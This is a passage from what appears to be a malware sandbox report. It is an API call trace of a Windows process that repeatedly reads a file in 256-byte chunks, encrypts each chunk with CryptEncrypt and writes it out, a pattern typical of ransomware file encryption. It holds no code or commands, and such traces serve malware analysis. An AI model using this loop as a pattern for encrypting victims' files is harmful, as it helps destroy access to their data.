dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.269] GetLastError () returned 0x0 [0153.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.270] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.270] GetLastError () returned 0x0 [0153.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.271] GetLastError () returned 0x0 [0153.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.271] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.272] GetLastError () returned 0x0 [0153.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.272] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 